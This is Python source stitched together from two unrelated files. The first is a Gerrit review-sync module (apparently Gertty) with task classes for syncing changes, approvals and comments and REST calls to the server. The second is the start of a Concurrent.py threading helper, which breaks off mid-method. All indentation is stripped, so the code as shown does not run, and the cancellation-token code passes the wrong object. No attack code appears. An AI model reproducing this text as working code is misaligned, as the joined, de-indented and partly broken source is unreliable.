self.log.debug('Query: %s ' % (query,))
for c in changes:
task = SyncChangeTask(c['id'], priority=self.priority)
self.tasks.append(task)
sync.submitTask(task)
self.log.debug("Sync change %s because it is number %s" % (c['id'], self.number))
class SyncOutdatedChangesTask(Task):
def __init__(self, priority=NORMAL_PRIORITY):
super(SyncOutdatedChangesTask, self).__init__(priority)
def __eq__(self, other):
if other.__class__ == self.__class__:
return True
return False
def __repr__(self):
return '<SyncOutdatedChangesTask>'
def run(self, sync):
with sync.app.db.getSession() as session:
for change in session.getOutdated():
self.log.debug("Sync outdated change %s" % (change.id,))
sync.submitTask(SyncChangeTask(change.id, priority=self.priority))
class SyncChangeTask(Task):
def __init__(self, change_id, force_fetch=False, priority=NORMAL_PRIORITY):
super(SyncChangeTask, self).__init__(priority)
self.change_id = change_id
self.force_fetch = force_fetch
def __repr__(self):
return '<SyncChangeTask %s>' % (self.change_id,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.change_id == self.change_id and
other.force_fetch == self.force_fetch):
return True
return False
def run(self, sync):
start_time = time.time()
try:
self._syncChange(sync)
end_time = time.time()
total_time = end_time - start_time
self.log.info("Synced change %s in %0.5f seconds.", self.change_id, total_time)
except Exception:
try:
self.log.error("Marking change %s outdated" % (self.change_id,))
with sync.app.db.getSession() as session:
change = session.getChangeByID(self.change_id)
change.outdated = True
except Exception:
self.log.exception("Error while marking change %s as outdated" % (self.change_id,))
raise
def _syncChange(self, sync):
app = sync.app
remote_change = sync.get('changes/%s?o=DETAILED_LABELS&o=ALL_REVISIONS&o=ALL_COMMITS&o=MESSAGES&o=DETAILED_ACCOUNTS&o=CURRENT_ACTIONS&o=ALL_FILES' % self.change_id)
# Perform subqueries this task will need outside of the db session
for remote_commit, remote_revision in remote_change.get('revisions', {}).items():
remote_comments_data = sync.get('changes/%s/revisions/%s/comments' % (self.change_id, remote_commit))
remote_revision['_gertty_remote_comments_data'] = remote_comments_data
remote_conflicts = sync.query(['q=status:open+is:mergeable+conflicts:%s' %
remote_change['_number']])
fetches = collections.defaultdict(list)
parent_commits = set()
with app.db.getSession() as session:
change = session.getChangeByID(self.change_id)
account = session.getAccountByID(remote_change['owner']['_account_id'],
name=remote_change['owner'].get('name'),
username=remote_change['owner'].get('username'),
email=remote_change['owner'].get('email'))
if not change:
project = session.getProjectByName(remote_change['project'])
if not project:
self.log.debug("Project %s unknown while syncing change" % (
remote_change['project'],))
remote_project = sync.get('projects/%s' %
(urlparse.quote_plus(remote_change['project']),))
if remote_project:
project = session.createProject(
remote_project['name'],
description=remote_project.get('description', ''))
self.log.info("Created project %s", project.name)
self.results.append(ProjectAddedEvent(project))
sync.submitTask(SyncProjectBranchesTask(project.name, self.priority))
created = dateutil.parser.parse(remote_change['created'])
updated = dateutil.parser.parse(remote_change['updated'])
change = project.createChange(remote_change['id'], account, remote_change['_number'],
remote_change['branch'], remote_change['change_id'],
remote_change['subject'], created,
updated, remote_change['status'],
topic=remote_change.get('topic'))
self.log.info("Created new change %s in local DB.", change.id)
result = ChangeAddedEvent(change)
else:
result = ChangeUpdatedEvent(change)
app.project_cache.clear(change.project)
self.results.append(result)
change.owner = account
if change.status != remote_change['status']:
change.status = remote_change['status']
result.status_changed = True
if remote_change.get('starred'):
change.starred = True
else:
change.starred = False
change.subject = remote_change['subject']
change.updated = dateutil.parser.parse(remote_change['updated'])
change.topic = remote_change.get('topic')
unseen_conflicts = [x.id for x in change.conflicts]
for remote_conflict in remote_conflicts:
conflict_id = remote_conflict['id']
conflict = session.getChangeByID(conflict_id)
if not conflict:
self.log.info("Need to sync conflicting change %s for change %s.",
conflict_id, change.number)
sync.submitTask(SyncChangeTask(conflict_id, priority=self.priority))
else:
if conflict not in change.conflicts:
self.log.info("Added conflict %s for change %s in local DB.",
conflict.number, change.number)
change.addConflict(conflict)
self.results.append(ChangeUpdatedEvent(conflict))
if conflict_id in unseen_conflicts:
unseen_conflicts.remove(conflict_id)
for conflict_id in unseen_conflicts:
conflict = session.getChangeByID(conflict_id)
self.log.info("Deleted conflict %s for change %s in local DB.",
conflict.number, change.number)
change.delConflict(conflict)
self.results.append(ChangeUpdatedEvent(conflict))
repo = gitrepo.get_repo(change.project.name, app.config)
new_revision = False
for remote_commit, remote_revision in remote_change.get('revisions', {}).items():
revision = session.getRevisionByCommit(remote_commit)
# TODO: handle multiple parents
url = sync.app.config.git_url + change.project.name
if 'anonymous http' in remote_revision['fetch']:
ref = remote_revision['fetch']['anonymous http']['ref']
url = remote_revision['fetch']['anonymous http']['url']
auth = False
elif 'http' in remote_revision['fetch']:
auth = True
ref = remote_revision['fetch']['http']['ref']
url = list(urlparse.urlsplit(sync.app.config.url + change.project.name))
url[1] = '%s:%s@%s' % (
urlparse.quote_plus(sync.app.config.username),
urlparse.quote_plus(sync.app.config.password), url[1])
url = urlparse.urlunsplit(url)
elif 'ssh' in remote_revision['fetch']:
ref = remote_revision['fetch']['ssh']['ref']
url = remote_revision['fetch']['ssh']['url']
auth = False
elif 'git' in remote_revision['fetch']:
ref = remote_revision['fetch']['git']['ref']
url = remote_revision['fetch']['git']['url']
auth = False
else:
if len(remote_revision['fetch']):
errMessage = "No supported fetch method found. Server offers: %s" % (
', '.join(remote_revision['fetch'].keys()))
else:
errMessage = "The server is missing the download-commands plugin."
raise Exception(errMessage)
if (not revision) or self.force_fetch:
fetches[url].append('+%(ref)s:%(ref)s' % dict(ref=ref))
if not revision:
revision = change.createRevision(remote_revision['_number'],
remote_revision['commit']['message'], remote_commit,
remote_revision['commit']['parents'][0]['commit'],
auth, ref)
self.log.info("Created new revision %s for change %s revision %s in local DB.",
revision.key, self.change_id, remote_revision['_number'])
new_revision = True
revision.message = remote_revision['commit']['message']
actions = remote_revision.get('actions', {})
revision.can_submit = 'submit' in actions
# TODO: handle multiple parents
if revision.parent not in parent_commits:
parent_revision = session.getRevisionByCommit(revision.parent)
if not parent_revision and change.status not in CLOSED_STATUSES:
sync._syncChangeByCommit(revision.parent, self.priority)
self.log.debug("Change %s revision %s needs parent commit %s synced" %
(change.id, remote_revision['_number'], revision.parent))
parent_commits.add(revision.parent)
result.updateRelatedChanges(session, change)
f = revision.getFile('/COMMIT_MSG')
if f is None:
f = revision.createFile('/COMMIT_MSG', None,
None, None, None)
for remote_path, remote_file in remote_revision['files'].items():
f = revision.getFile(remote_path)
if f is None:
if remote_file.get('binary'):
inserted = deleted = None
else:
inserted = remote_file.get('lines_inserted', 0)
deleted = remote_file.get('lines_deleted', 0)
f = revision.createFile(remote_path, remote_file.get('status', 'M'),
remote_file.get('old_path'),
inserted, deleted)
remote_comments_data = remote_revision['_gertty_remote_comments_data']
for remote_file, remote_comments in remote_comments_data.items():
for remote_comment in remote_comments:
account = session.getAccountByID(remote_comment['author']['_account_id'],
name=remote_comment['author'].get('name'),
username=remote_comment['author'].get('username'),
email=remote_comment['author'].get('email'))
comment = session.getCommentByID(remote_comment['id'])
if not comment:
# Normalize updated -> created
created = dateutil.parser.parse(remote_comment['updated'])
parent = False
if remote_comment.get('side', '') == 'PARENT':
parent = True
fileobj = revision.getFile(remote_file)
if fileobj is None:
fileobj = revision.createFile(remote_file, 'M')
comment = fileobj.createComment(remote_comment['id'], account,
remote_comment.get('in_reply_to'),
created,
parent, remote_comment.get('line'),
remote_comment['message'])
self.log.info("Created new comment %s for revision %s in local DB.",
comment.key, revision.key)
else:
if comment.author != account:
comment.author = account
new_message = False
for remote_message in remote_change.get('messages', []):
if 'author' in remote_message:
account = session.getAccountByID(remote_message['author']['_account_id'],
name=remote_message['author'].get('name'),
username=remote_message['author'].get('username'),
email=remote_message['author'].get('email'))
if account.username != app.config.username:
new_message = True
else:
account = session.getSystemAccount()
message = session.getMessageByID(remote_message['id'])
if not message:
revision = session.getRevisionByNumber(change, remote_message.get('_revision_number', 1))
if revision:
# Normalize date -> created
created = dateutil.parser.parse(remote_message['date'])
message = revision.createMessage(remote_message['id'], account, created,
remote_message['message'])
self.log.info("Created new review message %s for revision %s in local DB.", message.key, revision.key)
else:
self.log.info("Unable to create new review message for revision %s because it is not in local DB (draft?).", remote_message.get('_revision_number'))
else:
if message.author != account:
message.author = account
remote_approval_entries = {}
remote_label_entries = {}
user_voted = False
for remote_label_name, remote_label_dict in remote_change.get('labels', {}).items():
for remote_approval in remote_label_dict.get('all', []):
if remote_approval.get('value') is None:
continue
remote_approval['category'] = remote_label_name
key = '%s~%s' % (remote_approval['category'], remote_approval['_account_id'])
remote_approval_entries[key] = remote_approval
if remote_approval['_account_id'] == sync.account_id and int(remote_approval['value']) != 0:
user_voted = True
for key, value in remote_label_dict.get('values', {}).items():
# +1: "LGTM"
label = dict(value=key,
description=value,
category=remote_label_name)
key = '%s~%s~%s' % (label['category'], label['value'], label['description'])
remote_label_entries[key] = label
remote_approval_keys = set(remote_approval_entries.keys())
remote_label_keys = set(remote_label_entries.keys())
local_approvals = {}
local_labels = {}
user_votes = {}
for approval in change.approvals:
if approval.draft and not new_revision:
# If we have a new revision, we need to delete
# draft local approvals because they can no longer
# be uploaded. Otherwise, keep them because we
# may be about to upload a review. Ignoring an
# approval here means it will not be deleted.
# Also keep track of these approvals so we can
# determine whether we should hold the change
# later.
user_votes[approval.category] = approval.value
# Count draft votes as having voted for the
# purposes of deciding whether to clear the
# reviewed flag later.
user_voted = True
continue
key = '%s~%s' % (approval.category, approval.reviewer.id)
if key in local_approvals:
# Delete duplicate approvals.
session.delete(approval)
else:
local_approvals[key] = approval
local_approval_keys = set(local_approvals.keys())
for label in change.labels:
key = '%s~%s~%s' % (label.category, label.value, label.description)
local_labels[key] = label
local_label_keys = set(local_labels.keys())
for key in local_approval_keys-remote_approval_keys:
session.delete(local_approvals[key])
for key in local_label_keys-remote_label_keys:
session.delete(local_labels[key])
for key in remote_approval_keys-local_approval_keys:
remote_approval = remote_approval_entries[key]
account = session.getAccountByID(remote_approval['_account_id'],
name=remote_approval.get('name'),
username=remote_approval.get('username'),
email=remote_approval.get('email'))
change.createApproval(account,
remote_approval['category'],
remote_approval['value'])
self.log.info("Created approval for change %s in local DB.", change.id)
user_value = user_votes.get(remote_approval['category'], 0)
if user_value > 0 and remote_approval['value'] < 0:
# Someone left a negative vote after the local
# user created a draft positive vote. Hold the
# change so that it doesn't look like the local
# user is ignoring negative feedback.
if not change.held:
change.held = True
result.held_changed = True
self.log.info("Setting change %s to held due to negative review after positive", change.id)
for key in remote_label_keys-local_label_keys:
remote_label = remote_label_entries[key]
change.createLabel(remote_label['category'],
remote_label['value'],
remote_label['description'])
for key in remote_approval_keys.intersection(local_approval_keys):
local_approval = local_approvals[key]
remote_approval = remote_approval_entries[key]
local_approval.value = remote_approval['value']
# For the side effect of updating account info:
account = session.getAccountByID(remote_approval['_account_id'],
name=remote_approval.get('name'),
username=remote_approval.get('username'),
email=remote_approval.get('email'))
remote_permitted_entries = {}
for remote_label_name, remote_label_values in remote_change.get('permitted_labels', {}).items():
for remote_label_value in remote_label_values:
remote_label = dict(category=remote_label_name,
value=remote_label_value)
key = '%s~%s' % (remote_label['category'], remote_label['value'])
remote_permitted_entries[key] = remote_label
remote_permitted_keys = set(remote_permitted_entries.keys())
local_permitted = {}
for permitted in change.permitted_labels:
key = '%s~%s' % (permitted.category, permitted.value)
local_permitted[key] = permitted
local_permitted_keys = set(local_permitted.keys())
for key in local_permitted_keys-remote_permitted_keys:
session.delete(local_permitted[key])
for key in remote_permitted_keys-local_permitted_keys:
remote_permitted = remote_permitted_entries[key]
change.createPermittedLabel(remote_permitted['category'],
remote_permitted['value'])
if not user_voted:
# Only consider changing the reviewed state if we don't have a vote
if new_revision or new_message:
if change.reviewed:
change.reviewed = False
result.review_flag_changed = True
app.project_cache.clear(change.project)
change.outdated = False
for url, refs in fetches.items():
self.log.debug("Fetching from %s with refs %s", url, refs)
try:
repo.fetch(url, refs)
except Exception:
# Backwards compat with GitPython before the multi-ref fetch
# patch.
# (https://github.com/gitpython-developers/GitPython/pull/170)
for ref in refs:
self.log.debug("git fetch %s %s" % (url, ref))
repo.fetch(url, ref)
class CheckReposTask(Task):
# on startup, check all projects
# for any subscribed project withot a local repo or if
# --fetch-missing-refs is supplied, check all local changes for
# missing refs, and sync the associated changes
def __repr__(self):
return '<CheckReposTask>'
def __eq__(self, other):
if (other.__class__ == self.__class__):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
projects = session.getProjects(subscribed=True)
for project in projects:
try:
missing = False
try:
repo = gitrepo.get_repo(project.name, app.config)
except gitrepo.GitCloneError:
missing = True
if missing or app.fetch_missing_refs:
sync.submitTask(CheckRevisionsTask(project.key,
priority=LOW_PRIORITY))
except Exception:
self.log.exception("Exception checking repo %s" %
(project.name,))
class CheckRevisionsTask(Task):
def __init__(self, project_key, priority=NORMAL_PRIORITY):
super(CheckRevisionsTask, self).__init__(priority)
self.project_key = project_key
def __repr__(self):
return '<CheckRevisionsTask %s>' % (self.project_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.project_key == self.project_key):
return True
return False
def run(self, sync):
app = sync.app
to_sync = set()
with app.db.getSession() as session:
project = session.getProject(self.project_key)
repo = None
try:
repo = gitrepo.get_repo(project.name, app.config)
except gitrepo.GitCloneError:
pass
for change in project.open_changes:
if repo:
for revision in change.revisions:
if not (repo.hasCommit(revision.parent) and
repo.hasCommit(revision.commit)):
to_sync.add(change.id)
else:
to_sync.add(change.id)
for change_id in to_sync:
sync.submitTask(SyncChangeTask(change_id, priority=self.priority))
class UploadReviewsTask(Task):
def __repr__(self):
return '<UploadReviewsTask>'
def __eq__(self, other):
if (other.__class__ == self.__class__):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
for c in session.getPendingTopics():
sync.submitTask(SetTopicTask(c.key, self.priority))
for c in session.getPendingRebases():
sync.submitTask(RebaseChangeTask(c.key, self.priority))
for c in session.getPendingStatusChanges():
sync.submitTask(ChangeStatusTask(c.key, self.priority))
for c in session.getPendingStarred():
sync.submitTask(ChangeStarredTask(c.key, self.priority))
for c in session.getPendingCherryPicks():
sync.submitTask(SendCherryPickTask(c.key, self.priority))
for r in session.getPendingCommitMessages():
sync.submitTask(ChangeCommitMessageTask(r.key, self.priority))
for m in session.getPendingMessages():
sync.submitTask(UploadReviewTask(m.key, self.priority))
class SetTopicTask(Task):
def __init__(self, change_key, priority=NORMAL_PRIORITY):
super(SetTopicTask, self).__init__(priority)
self.change_key = change_key
def __repr__(self):
return '<SetTopicTask %s>' % (self.change_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.change_key == self.change_key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
change = session.getChange(self.change_key)
data = dict(topic=change.topic)
change.pending_topic = False
# Inside db session for rollback
sync.put('changes/%s/topic' % (change.id,),
data)
sync.submitTask(SyncChangeTask(change.id, priority=self.priority))
class RebaseChangeTask(Task):
def __init__(self, change_key, priority=NORMAL_PRIORITY):
super(RebaseChangeTask, self).__init__(priority)
self.change_key = change_key
def __repr__(self):
return '<RebaseChangeTask %s>' % (self.change_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.change_key == self.change_key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
change = session.getChange(self.change_key)
change.pending_rebase = False
# Inside db session for rollback
sync.post('changes/%s/rebase' % (change.id,), {})
sync.submitTask(SyncChangeTask(change.id, priority=self.priority))
class ChangeStarredTask(Task):
def __init__(self, change_key, priority=NORMAL_PRIORITY):
super(ChangeStarredTask, self).__init__(priority)
self.change_key = change_key
def __repr__(self):
return '<ChangeStarredTask %s>' % (self.change_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.change_key == self.change_key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
change = session.getChange(self.change_key)
if change.starred:
sync.put('accounts/self/starred.changes/%s' % (change.id,),
data={})
else:
sync.delete('accounts/self/starred.changes/%s' % (change.id,),
data={})
change.pending_starred = False
sync.submitTask(SyncChangeTask(change.id, priority=self.priority))
class ChangeStatusTask(Task):
def __init__(self, change_key, priority=NORMAL_PRIORITY):
super(ChangeStatusTask, self).__init__(priority)
self.change_key = change_key
def __repr__(self):
return '<ChangeStatusTask %s>' % (self.change_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.change_key == self.change_key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
change = session.getChange(self.change_key)
if change.pending_status_message:
data = dict(message=change.pending_status_message)
else:
data = {}
change.pending_status = False
change.pending_status_message = None
# Inside db session for rollback
if change.status == 'ABANDONED':
sync.post('changes/%s/abandon' % (change.id,),
data)
elif change.status == 'NEW':
sync.post('changes/%s/restore' % (change.id,),
data)
elif change.status == 'SUBMITTED':
sync.post('changes/%s/submit' % (change.id,), {})
sync.submitTask(SyncChangeTask(change.id, priority=self.priority))
class SendCherryPickTask(Task):
def __init__(self, cp_key, priority=NORMAL_PRIORITY):
super(SendCherryPickTask, self).__init__(priority)
self.cp_key = cp_key
def __repr__(self):
return '<SendCherryPickTask %s>' % (self.cp_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.cp_key == self.cp_key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
cp = session.getPendingCherryPick(self.cp_key)
data = dict(message=cp.message,
destination=cp.branch)
session.delete(cp)
# Inside db session for rollback
ret = sync.post('changes/%s/revisions/%s/cherrypick' %
(cp.revision.change.id, cp.revision.commit),
data)
if ret and 'id' in ret:
sync.submitTask(SyncChangeTask(ret['id'], priority=self.priority))
class ChangeCommitMessageTask(Task):
def __init__(self, revision_key, priority=NORMAL_PRIORITY):
super(ChangeCommitMessageTask, self).__init__(priority)
self.revision_key = revision_key
def __repr__(self):
return '<ChangeCommitMessageTask %s>' % (self.revision_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.revision_key == self.revision_key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
revision = session.getRevision(self.revision_key)
revision.pending_message = False
data = dict(message=revision.message)
# Inside db session for rollback
if sync.version < (2,11,0):
sync.post('changes/%s/revisions/%s/message' %
(revision.change.id, revision.commit),
data)
else:
edit = sync.get('changes/%s/edit' % revision.change.id)
if edit is not None:
raise Exception("Edit already in progress on change %s" %
(revision.change.number,))
sync.put('changes/%s/edit:message' % (revision.change.id,), data)
sync.post('changes/%s/edit:publish' % (revision.change.id,), {})
change_id = revision.change.id
sync.submitTask(SyncChangeTask(change_id, priority=self.priority))
class UploadReviewTask(Task):
def __init__(self, message_key, priority=NORMAL_PRIORITY):
super(UploadReviewTask, self).__init__(priority)
self.message_key = message_key
def __repr__(self):
return '<UploadReviewTask %s>' % (self.message_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.message_key == self.message_key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
message = session.getMessage(self.message_key)
if message is None:
self.log.debug("Message %s has already been uploaded" % (
self.message_key))
return
change = message.revision.change
if not change.held:
self.log.debug("Syncing %s to find out if it should be held" % (change.id,))
t = SyncChangeTask(change.id)
t.run(sync)
self.results += t.results
submit = False
change_id = None
with app.db.getSession() as session:
message = session.getMessage(self.message_key)
revision = message.revision
change = message.revision.change
if change.held:
self.log.debug("Not uploading review to %s because it is held" %
(change.id,))
return
change_id = change.id
current_revision = change.revisions[-1]
if change.pending_status and change.status == 'SUBMITTED':
submit = True
data = dict(message=message.message,
strict_labels=False)
if revision == current_revision:
data['labels'] = {}
for approval in change.draft_approvals:
data['labels'][approval.category] = approval.value
session.delete(approval)
comments = {}
for file in revision.files:
if file.draft_comments:
comment_list = []
for comment in file.draft_comments:
d = dict(line=comment.line,
message=comment.message)
if comment.parent:
d['side'] = 'PARENT'
comment_list.append(d)
session.delete(comment)
comments[file.path] = comment_list
if comments:
data['comments'] = comments
session.delete(message)
# Inside db session for rollback
sync.post('changes/%s/revisions/%s/review' % (change.id, revision.commit),
data)
if submit:
# In another db session in case submit fails after posting
# the message succeeds
with app.db.getSession() as session:
change = session.getChangeByID(change_id)
change.pending_status = False
change.pending_status_message = None
sync.post('changes/%s/submit' % (change_id,), {})
sync.submitTask(SyncChangeTask(change_id, priority=self.priority))
class PruneDatabaseTask(Task):
def __init__(self, age, priority=NORMAL_PRIORITY):
super(PruneDatabaseTask, self).__init__(priority)
self.age = age
def __repr__(self):
return '<PruneDatabaseTask %s>' % (self.age,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.age == self.age):
return True
return False
def run(self, sync):
if not self.age:
return
app = sync.app
with app.db.getSession() as session:
for change in session.getChanges('status:closed age:%s' % self.age):
t = PruneChangeTask(change.key, priority=self.priority)
self.tasks.append(t)
sync.submitTask(t)
t = VacuumDatabaseTask(priority=self.priority)
self.tasks.append(t)
sync.submitTask(t)
class PruneChangeTask(Task):
def __init__(self, key, priority=NORMAL_PRIORITY):
super(PruneChangeTask, self).__init__(priority)
self.key = key
def __repr__(self):
return '<PruneChangeTask %s>' % (self.key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.key == self.key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
change = session.getChange(self.key)
if not change:
return
repo = gitrepo.get_repo(change.project.name, app.config)
self.log.info("Pruning %s change %s status:%s updated:%s" % (
change.project.name, change.number, change.status, change.updated))
change_ref = None
for revision in change.revisions:
if change_ref is None:
change_ref = '/'.join(revision.fetch_ref.split('/')[:-1])
self.log.info("Deleting %s ref %s" % (
change.project.name, revision.fetch_ref))
repo.deleteRef(revision.fetch_ref)
self.log.info("Deleting %s ref %s" % (
change.project.name, change_ref))
try:
repo.deleteRef(change_ref)
except OSError as e:
if e.errno not in [errno.EISDIR, errno.EPERM]:
raise
session.delete(change)
class VacuumDatabaseTask(Task):
def __init__(self, priority=NORMAL_PRIORITY):
super(VacuumDatabaseTask, self).__init__(priority)
def __repr__(self):
return '<VacuumDatabaseTask>'
def __eq__(self, other):
if other.__class__ == self.__class__:
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
session.vacuum()
class Sync(object):
def __init__(self, app, disable_background_sync):
self.user_agent = 'Gertty/%s %s' % (gertty.version.version_info.release_string(),
requests.utils.default_user_agent())
self.version = (0, 0, 0)
self.offline = False
self.account_id = None
self.app = app
self.log = logging.getLogger('gertty.sync')
self.queue = MultiQueue([HIGH_PRIORITY, NORMAL_PRIORITY, LOW_PRIORITY])
self.result_queue = queue.Queue()
self.session = requests.Session()
if self.app.config.auth_type == 'basic':
authclass = requests.auth.HTTPBasicAuth
elif self.app.config.auth_type == 'form':
authclass = FormAuth
else:
authclass = requests.auth.HTTPDigestAuth
self.auth = authclass(
self.app.config.username, self.app.config.password)
self.submitTask(GetVersionTask(HIGH_PRIORITY))
self.submitTask(SyncOwnAccountTask(HIGH_PRIORITY))
if not disable_background_sync:
self.submitTask(CheckReposTask(HIGH_PRIORITY))
self.submitTask(UploadReviewsTask(HIGH_PRIORITY))
self.submitTask(SyncProjectListTask(HIGH_PRIORITY))
self.submitTask(SyncSubscribedProjectsTask(NORMAL_PRIORITY))
self.submitTask(SyncSubscribedProjectBranchesTask(LOW_PRIORITY))
self.submitTask(SyncOutdatedChangesTask(LOW_PRIORITY))
self.submitTask(PruneDatabaseTask(self.app.config.expire_age, LOW_PRIORITY))
self.periodic_thread = threading.Thread(target=self.periodicSync)
self.periodic_thread.daemon = True
self.periodic_thread.start()
def periodicSync(self):
hourly = time.time()
while True:
try:
time.sleep(60)
self.syncSubscribedProjects()
now = time.time()
if now-hourly > 3600:
hourly = now
self.pruneDatabase()
self.syncOutdatedChanges()
except Exception:
self.log.exception('Exception in periodicSync')
def submitTask(self, task):
if not self.offline:
if not self.queue.put(task, task.priority):
task.complete(False)
else:
task.complete(False)
def run(self, pipe):
task = None
while True:
task = self._run(pipe, task)
def _run(self, pipe, task=None):
if not task:
task = self.queue.get()
self.log.debug('Run: %s' % (task,))
try:
task.run(self)
task.complete(True)
self.queue.complete(task)
except (requests.ConnectionError, OfflineError) as e:
self.log.warning("Offline due to: %s" % (e,))
if not self.offline:
self.submitTask(GetVersionTask(HIGH_PRIORITY))
self.submitTask(UploadReviewsTask(HIGH_PRIORITY))
self.offline = True
self.app.status.update(offline=True, refresh=False)
os.write(pipe, six.b('refresh\n'))
time.sleep(30)
return task
except Exception:
task.complete(False)
self.queue.complete(task)
self.log.exception('Exception running task %s' % (task,))
self.app.status.update(error=True, refresh=False)
self.offline = False
self.app.status.update(offline=False, refresh=False)
for r in task.results:
self.result_queue.put(r)
os.write(pipe, six.b('refresh\n'))
return None
def url(self, path):
return self.app.config.url + 'a/' + path
def checkResponse(self, response):
self.log.debug('HTTP status code: %d', response.status_code)
if response.status_code == 503:
raise OfflineError("Received 503 status code")
def get(self, path):
url = self.url(path)
self.log.debug('GET: %s' % (url,))
r = self.session.get(url,
verify=self.app.config.verify_ssl,
auth=self.auth, timeout=TIMEOUT,
headers = {'Accept': 'application/json',
'Accept-Encoding': 'gzip',
'User-Agent': self.user_agent})
self.checkResponse(r)
if r.status_code == 200:
ret = json.loads(r.text[4:])
if len(ret):
self.log.debug('200 OK, Received: %s' % (ret,))
else:
self.log.debug('200 OK, No body.')
return ret
def post(self, path, data):
url = self.url(path)
self.log.debug('POST: %s' % (url,))
self.log.debug('data: %s' % (data,))
r = self.session.post(url, data=json.dumps(data).encode('utf8'),
verify=self.app.config.verify_ssl,
auth=self.auth, timeout=TIMEOUT,
headers = {'Content-Type': 'application/json;charset=UTF-8',
'User-Agent': self.user_agent})
self.checkResponse(r)
self.log.debug('Received: %s' % (r.text,))
ret = None
if r.text and len(r.text)>4:
try:
ret = json.loads(r.text[4:])
except Exception:
self.log.exception("Unable to parse result %s from post to %s" %
(r.text, url))
return ret
def put(self, path, data):
url = self.url(path)
self.log.debug('PUT: %s' % (url,))
self.log.debug('data: %s' % (data,))
r = self.session.put(url, data=json.dumps(data).encode('utf8'),
verify=self.app.config.verify_ssl,
auth=self.auth, timeout=TIMEOUT,
headers = {'Content-Type': 'application/json;charset=UTF-8',
'User-Agent': self.user_agent})
self.checkResponse(r)
self.log.debug('Received: %s' % (r.text,))
def delete(self, path, data):
url = self.url(path)
self.log.debug('DELETE: %s' % (url,))
self.log.debug('data: %s' % (data,))
r = self.session.delete(url, data=json.dumps(data).encode('utf8'),
verify=self.app.config.verify_ssl,
auth=self.auth, timeout=TIMEOUT,
headers = {'Content-Type': 'application/json;charset=UTF-8',
'User-Agent': self.user_agent})
self.checkResponse(r)
self.log.debug('Received: %s' % (r.text,))
def syncSubscribedProjects(self):
task = SyncSubscribedProjectsTask(LOW_PRIORITY)
self.submitTask(task)
if task.wait():
for subtask in task.tasks:
subtask.wait()
def pruneDatabase(self):
task = PruneDatabaseTask(self.app.config.expire_age, LOW_PRIORITY)
self.submitTask(task)
if task.wait():
for subtask in task.tasks:
subtask.wait()
def syncOutdatedChanges(self):
task = SyncOutdatedChangesTask(LOW_PRIORITY)
self.submitTask(task)
if task.wait():
for subtask in task.tasks:
subtask.wait()
def _syncChangeByCommit(self, commit, priority):
# Accumulate sync change by commit tasks because they often
# come in batches. This method assumes it is being called
# from within the run queue already and therefore does not
# need to worry about locking the queue.
task = None
for task in self.queue.find(SyncChangesByCommitsTask, priority):
if task.addCommit(commit):
return
task = SyncChangesByCommitsTask([commit], priority)
self.submitTask(task)
def setRemoteVersion(self, version):
base = version.split('-')[0]
parts = base.split('.')
major = minor = micro = 0
if len(parts) > 0:
major = int(parts[0])
if len(parts) > 1:
minor = int(parts[1])
if len(parts) > 2:
micro = int(parts[2])
self.version = (major, minor, micro)
self.log.info("Remote version is: %s (parsed as %s)" % (version, self.version))
def query(self, queries):
changes = []
sortkey = ''
done = False
offset = 0
while not done:
query = '&'.join(queries)
# We don't actually want to limit to 500, but that's the server-side default, and
# if we don't specify this, we won't get a _more_changes flag.
q = 'changes/?n=500%s&%s' % (sortkey, query)
self.log.debug('Query: %s' % (q,))
responses = self.get(q)
if len(queries) == 1:
responses = [responses]
done = True
for batch in responses:
changes += batch
if batch and '_more_changes' in batch[-1]:
done = False
if '_sortkey' in batch[-1]:
sortkey = '&N=%s' % (batch[-1]['_sortkey'],)
else:
offset += len(batch)
sortkey = '&start=%s' % (offset,)
return changes
|
Concurrent.py
|
# encoding: utf-8
'''
Created on 2016/02/25
@author: _
'''
import Queue
import random
import sys
import threading
import time
import weakref
WORKER_THREAD_LIFETIME = 3 # seconds
THREAD_SIGNAL_TRACE_ENABLED = True # True if threading.settrace hack is enabled
_UNUSED_QUEUE_EMPTY = Queue.Empty # Sometimes the reference to Queue.Empty is releases on process termination.
ERASE_UNHANDLED_TASK_EXCEPTION_FRAME_LOCALS = False
class ExecutorThreadInterrupt(Exception):
pass
class TaskError(Exception):
pass
class FutureError(Exception):
pass
class CancellationTokenSource(object):
"""
(Like .net framework's class System.Threading.CancellationTokenSource) This class represents a 'Cancellation' for task.
"""
class CancellationToken(object):
"""
A token object which used to check cancelled or not.
"""
def __init__(self, parent):
"""
Initializer
@param parent: A corresponding CancellationTokenSource object
"""
self.__parent = parent
@property
def isCancelled(self):
"""
Returns the corresponding CancellationTokenSource object's isCancelled property.
This method may be blocking.
"""
return self.__parent.isCancelled()
def __init__(self):
"""
Initialize
"""
self.__condition = threading.RLock()
self.__cancelled = False
def newToken(self):
"""
Takes new CancellationToken object
@return: new CancellationToken object which is associated to this
"""
return self.CancellationToken(self.__condition)
@property
def isCancelled(self):
"""
Returns True if and only if this CancellationTokenSource had been 'Cancelled'.
@return: True if had been cancelled
"""
with self.__condition:
return self.__cancelled
def cancel(self):
"""
Mark this CancellationTokenSource object to 'Cancelled'.
This method may be blocking.
This method is executed atomically.
"""
with self.__condition:
